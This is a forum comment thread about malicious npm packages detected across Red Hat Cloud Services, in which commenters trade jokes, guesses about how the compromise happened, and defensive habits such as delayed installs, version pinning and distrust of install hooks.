Malicious npm packages detected across Red Hat Cloud Services

jofzar

'No Way to Prevent This,' Says Only package manager Where This Regularly Happens Edit: some people don't understand that it's a defence to https://en.wikipedia.org/wiki/%27No_Way_to_Prevent_This,%27_...

buckle8017

Redhat's entire reason for existence is to prevent this.

dmix

Our company uses yarn 4 which has an option to prevent you from installing an npm package for the first number of days of its release. Most of these seem to be caught within that timeframe (1-3 days). https://gist.github.com/mcollina/b294a6c39ee700d24073c0e5a4e...

freakynit

Lol.. yet again npm and install-scripts abuse at play. Updated: 1. All exploitation techniques used since May 2025: https://npm-supply-chain-attack-techniques.pagey.site/ 2. All attacks that happened since May 2025: https://npm-supply-chain-attacks-25-26.pagey.site/

indy

This is a completely unexpected turn of events that no one could have possibly foreseen.

m3kw9

At some point, they need a new system for these "packages", you've got to be insane to install any of these right now.

arianvanp

Given they use nx my bet is on developer laptop compromise through the nx vscode extension that also compromised GitHub engineer's laptop

gbuk2013

I came across this interesting rant the other day: https://github.com/uNetworking/uWebSockets.js/blob/master/mi... It does make sense that the right way would be to fork every dependency you use and install from your own repo reviewing and merging from upstream as needed. Would be a giant PITA though. :)

what_hn

Same actors again?

rvz

This repository itself had to previously update from the axios supply chain attack [0] (co-authored by Claude lol). But just by looking at the change itself, the package is unpinned and won't solve the problem if another malicious security update happens again. So if you have an unpinned version of this package and you run 'npm install', you immediately downloaded the compromised version and that's that. [0] https://github.com/RedHatInsights/javascript-clients/commit/...

general_reveal

That’s why I switched to Java.

paulbjensen

Looks like RedHat got compromised by a Black Hat…

phishin

Chainguard based images, packages and libraries are first line of defense. Expensive? Yes. Foolproof? No. I think these types services will be mandatory in the near future.

king_zee

I've made it a habit now to use the --before=2026-05-30 flag when installing packages, where it'll pick the version released before the date you specify, I usually pick around 5 days ago

Sudhanshu2310

We have done the complete analysis and there are 32 packages share the same publishing pipeline. https://safedep.io/redhat-cloud-services-hit-by-mini-shai-hu...

voidUpdate

One thing I've never understood is why NPM allows packages to run code immediately after they are installed. What's the use case for that? A package should just be some code you can call on at runtime

shrikant

Oooh now I'm wondering if this may have contributed to their Docker image distribution service getting disrupted earlier today... https://status.redhat.com/incidents/jn6r256zc62c

bobkb

When will npm issues stop ? This has become a big pain !

kitd

Hmm, same day as RH and IBM announce Project Lightwell to help detect and fix supply chain vulns. https://www.redhat.com/en/lightwell

tetsgima

man we gotta do smth with preinstall hooks atp